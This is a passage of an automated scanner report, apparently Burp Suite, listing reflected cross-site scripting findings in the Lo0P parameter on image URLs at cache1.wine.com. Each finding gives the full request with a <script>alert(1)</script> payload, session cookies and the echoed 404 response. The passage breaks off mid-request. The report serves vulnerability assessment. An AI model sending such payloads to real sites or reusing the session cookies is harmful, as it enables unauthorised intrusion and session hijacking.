<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavRtArrow.jpg?Lo0P=9cd12<script>alert(1)</script>cee0b6c74f6 was not found on this server.<P>
...[SNIP]...

1.53. http://cache1.wine.com/images/css/homeNavTop.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavTop.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload e2408<script>alert(1)</script>86a64488141 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavTop.gif?Lo0P=e2408<script>alert(1)</script>86a64488141 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 261
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavTop.gif?Lo0P=e2408<script>alert(1)</script>86a64488141 was not found on this server.<P>
...[SNIP]...

1.54. http://cache1.wine.com/images/css/homeNavTopDark.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/homeNavTopDark.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload a9a89<script>alert(1)</script>1e67ffe411c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/homeNavTopDark.gif?Lo0P=a9a89<script>alert(1)</script>1e67ffe411c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:21 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/homeNavTopDark.gif?Lo0P=a9a89<script>alert(1)</script>1e67ffe411c was not found on this server.<P>
...[SNIP]...

1.55. http://cache1.wine.com/images/css/twiiterIcon.png [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/css/twiiterIcon.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c5b0f<script>alert(1)</script>98c67228d6c was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/css/twiiterIcon.png?Lo0P=c5b0f<script>alert(1)</script>98c67228d6c HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 262
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/css/twiiterIcon.png?Lo0P=c5b0f<script>alert(1)</script>98c67228d6c was not found on this server.<P>
...[SNIP]...

1.56. http://cache1.wine.com/images/glo_icon_boutique_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_icon_boutique_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 71b03<script>alert(1)</script>89ce984e47a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_boutique_big.gif?Lo0P=71b03<script>alert(1)</script>89ce984e47a HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_boutique_big.gif?Lo0P=71b03<script>alert(1)</script>89ce984e47a was not found on this server.<P>
...[SNIP]...

1.57. http://cache1.wine.com/images/glo_icon_organic_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_icon_organic_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload cea43<script>alert(1)</script>46509bea0df was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_organic_big.gif?Lo0P=cea43<script>alert(1)</script>46509bea0df HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 267
Date: Mon, 14 Feb 2011 17:16:36 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_organic_big.gif?Lo0P=cea43<script>alert(1)</script>46509bea0df was not found on this server.<P>
...[SNIP]...

1.58. http://cache1.wine.com/images/glo_icon_screwcap_big.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_icon_screwcap_big.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 37bf3<script>alert(1)</script>9d56b3d0f60 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_icon_screwcap_big.gif?Lo0P=37bf3<script>alert(1)</script>9d56b3d0f60 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_icon_screwcap_big.gif?Lo0P=37bf3<script>alert(1)</script>9d56b3d0f60 was not found on this server.<P>
...[SNIP]...

1.59. http://cache1.wine.com/images/glo_tn_top_corners_two.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/glo_tn_top_corners_two.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 3ecdb<script>alert(1)</script>77b4170955e was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/glo_tn_top_corners_two.gif?Lo0P=3ecdb<script>alert(1)</script>77b4170955e HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 269
Date: Mon, 14 Feb 2011 17:16:20 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/glo_tn_top_corners_two.gif?Lo0P=3ecdb<script>alert(1)</script>77b4170955e was not found on this server.<P>
...[SNIP]...

1.60. http://cache1.wine.com/images/gradiantBg.png [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/gradiantBg.png

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload d3039<script>alert(1)</script>bd5a837b3d6 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/gradiantBg.png?Lo0P=d3039<script>alert(1)</script>bd5a837b3d6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 257
Date: Mon, 14 Feb 2011 17:16:06 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/gradiantBg.png?Lo0P=d3039<script>alert(1)</script>bd5a837b3d6 was not found on this server.<P>
...[SNIP]...

1.61. http://cache1.wine.com/images/homepage/372x105_ipad.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/372x105_ipad.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 390d4<script>alert(1)</script>7ef77c96728 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/372x105_ipad.jpg?Lo0P=390d4<script>alert(1)</script>7ef77c96728 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 268
Date: Mon, 14 Feb 2011 17:16:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/372x105_ipad.jpg?Lo0P=390d4<script>alert(1)</script>7ef77c96728 was not found on this server.<P>
...[SNIP]...

1.62. http://cache1.wine.com/images/homepage/372x105_stewardship.jpg [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/372x105_stewardship.jpg

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload d3b0a<script>alert(1)</script>a6932290e19 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/372x105_stewardship.jpg?Lo0P=d3b0a<script>alert(1)</script>a6932290e19 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmc=139987105; __utmb=139987105.1.10.1297703812; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 275
Date: Mon, 14 Feb 2011 17:16:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/372x105_stewardship.jpg?Lo0P=d3b0a<script>alert(1)</script>a6932290e19 was not found on this server.<P>
...[SNIP]...

1.63. http://cache1.wine.com/images/homepage/bgkFooter.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/bgkFooter.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 1b489<script>alert(1)</script>4c3520ea41b was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/bgkFooter.gif?Lo0P=1b489<script>alert(1)</script>4c3520ea41b HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 265
Date: Mon, 14 Feb 2011 17:16:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/bgkFooter.gif?Lo0P=1b489<script>alert(1)</script>4c3520ea41b was not found on this server.<P>
...[SNIP]...

1.64. http://cache1.wine.com/images/homepage/bgkSignUpBorder.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/bgkSignUpBorder.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload 67148<script>alert(1)</script>a87fab69ea6 was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/bgkSignUpBorder.gif?Lo0P=67148<script>alert(1)</script>a87fab69ea6 HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=32446520.1297605361.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/31|utmcmd=referral; __utma=32446520.451721562.1297605361.1297605361.1297605361.1; __utmv=32446520.Strangeloop%20TreatmentSet%3A%20Accelerated; SL_Audience=359|Accelerated|560|1|0; SL_NV1=1|1; SessionGUID=DA01AF94%2D52D0%2D4E39%2D987F%2D0212906047F7; ASPSESSIONIDQSSTAQAD=JFFBMHNDAHGLOPNKMBOJMGFK; s_cc=true; s_sq=%5B%5BB%5D%5D; __utma=139987105.1543186272.1297703812.1297703812.1297703812.1; __utmb=139987105; __utmc=139987105; __utmz=139987105.1297703812.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/57|utmcmd=referral; ASP.NET_SessionId=n1egzs11flt0v01mzouymd2b; warehouse=CA; cSource=error_404; SL_UVId=2B1D3845DC85E9DA

Response

HTTP/1.1 404 Not Found
Server: SLRS
Content-Type: text/html
Content-Length: 271
Date: Mon, 14 Feb 2011 17:16:07 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /images/homepage/bgkSignUpBorder.gif?Lo0P=67148<script>alert(1)</script>a87fab69ea6 was not found on this server.<P>
...[SNIP]...

1.65. http://cache1.wine.com/images/homepage/btnSignUp.gif [Lo0P parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cache1.wine.com
Path:   /images/homepage/btnSignUp.gif

Issue detail

The value of the Lo0P request parameter is copied into the HTML document as plain text between tags. The payload c16d4<script>alert(1)</script>6e3a014bc6a was submitted in the Lo0P parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/homepage/btnSignUp.gif?Lo0P=c16d4<script>alert(1)</script>6e3a014bc6a HTTP/1.1
Host: cache1.wine.com
Proxy-Connection: keep-alive
Referer: http://cache1.wine.com/?s=error_404
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
